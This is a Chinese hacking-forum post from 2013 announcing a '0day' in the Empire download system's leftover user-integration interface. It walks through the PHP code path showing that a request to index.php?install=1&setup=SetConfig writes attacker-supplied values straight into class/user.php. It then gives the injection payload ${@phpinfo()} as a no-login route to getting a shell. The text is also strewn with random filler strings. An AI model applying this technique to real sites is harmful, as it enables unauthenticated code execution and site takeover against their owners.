找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2405|回复: 0
打印 上一主题 下一主题

帝国万能接口漏洞0day

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-23 09:34:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
这是帝国的一套下载系统如图 ps(不需要任何账户和密码,直接写shell) 由于很多站是由于下载要整合discuz等等一些论坛.... 而帝国他又有一个万能接口,如图 而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码 当我们
: H' `5 T' b# e; ^2 Z' c6 v
" o6 r3 ~8 {. B5 r; u


+ q! L2 ^  @* ~7 P9 p( J" D' p) P这是帝国的一套下载系统 如图+ l$ R* x: u: q7 H
ps(不需要任何账户和密码,直接写shell)


) O3 B& }8 k. V+ W' y# k

由于很多站是由于下载要整合discuz 等等一些论坛....
! d/ b1 C8 M0 Y/ q+ M- T

- a' Z" `- p% z

而帝国他又有一个万能接口,如图


, ^: \( x3 {3 x6 Z+ m- c0 q1 W0 J. |- g
& M& O. W& e0 v, l7 h

而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码% w$ E" `! V7 s/ l$ A

9 G+ _% ?, k: A当我们提交的时候,他地址是提交到index.php?install=1&setup=SetConfig

1. if($_GET['install']==1)
2. {
3. @include("../class/connect.php");
4. @include("../class/db_sql.php");
5. @include("../class/functions.php");
6. $link=db_connect();
7. $empire=new mysqlquery();
8. if($setup=="SetConfig")
9. {
10. SetUserCOMConfig($_POST);
11. }
12. elseif($setup=="alter")
13. {
14. InstallUserCOM();
15. }
16. elseif($setup=="update")
17. {
18. UpdateUserCOM();
19. }
20. else
21. {}

复制代码

他这里开始调用一个SetUserCOMConfig的函数了,我们继续跟踪
5 Y$ W6 N, l" r) @% P# V. U6 J6 Q3 N' v1 l. X! O
在data/fun.php中的15行+ y4 f' h5 m; [3 M% w

& c- b( c- v2 }我们可以看到这个函数

1. function SetUserCOMConfig($add){
2. $filetext=ReadFiletext('data/user.php');
3. if(empty($filetext))
4. {
5. InstallShowMsg('文件 /update/data/user.php 丢失,安装不成功.');
6. }
7. $vr=explode(",",ReturnRepUserVar());
8. $count=count($vr);
9. for($i=0;$i<$count;$i++)
10. {
11. $filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext);
12. }
13. //写入配置文件
14. $fp=@fopen("../class/user.php","w");
15. if(!$fp)
16. {  G  v1 H5 u( h( w# W6 |) n
17. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.');
18. }
19. @fputs($fp,$filetext);
20. @fclose($fp);

复制代码

.....//省略若干
+ f7 W1 R! s$ V  }) a6 _- B4 i% T" ^; S' V6 b, C# V7 h' f
这里的他将$filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext);# m% f' W8 H2 c1 x0 F; f
: J: z# }/ S% L2 z$ Q2 O  A, w. b
他将传进来的变量进行了切割,然后赋给了$filetext
3 \" @/ R% e  e5 c4 m' u4 c) S" z8 h
然后看下面

1. //写入配置文件
2. $fp=@fopen("../class/user.php","w");
3. if(!$fp)
4. {
5. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.');
6. }
7. @fputs($fp,$filetext);

复制代码

打开了一个class/user.php文件,然后将$filetext写入了
! c( i- K6 U  f, T4 Q; ]1 _! }2 m; d6 Y
我们看看写入的结果,随便填一个


9 U& F% d( I+ ?" Q+ Q8 L* p
: r) F2 C: k$ s9 P' V' U0 E0 z/ Y8 ?

3 d5 X* e( _( ]. K8 N, t( x9 _# _$ F3 f; i% L, t8 H0 q# Y7 O/ A& m

; B! G- j9 M+ h0 ^
) ?$ F. l5 o9 s) a

3 ~" C& i; v0 y+ D. Q
+ h$ X, K, Y5 a/ y" W( W5 Y( Y1 v2 U% h

! A4 w* f; f( ~7 U2 n6 A% f( u7 f9 I* {6 c
' _: D- n, w' q$ E( j1 ?3 N) S

2 K3 y5 N# Q. k- e2 F8 a% k2 G; x5 h* n5 x  D9 R

# A4 G! H8 p: R* N8 ?# |

0 a4 h- Y4 I1 X1 c# u
/ I3 b* K" ?5 e8 j' i: x4 k/ `) C6 O

) q  k$ G: P' O
' y% ~+ J( [& Q6 J7 C8 S* @# m, C, }$ f
& f. F* _# p$ p) y7 v1 @

( K) m8 p1 f5 V* o

所以我们淫荡点,写个${@phpinfo()}试试

' ]3 V8 ~, T, a4 ?* Q

然后访问以下class/user.php这个文件
5 {0 U1 c9 ?# x( {# ~日了吧


/ q7 s; L0 s/ |1 F

5 x- E4 ^1 V# j% L4 t0 j* X1 \
6 \  |  r4 s: M
4 l. Z) {% X6 O2 n1 u5 [
. u0 G2 G# g$ X( @

+ Q5 a) k* U' b; K+ M2 O0 \% b

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表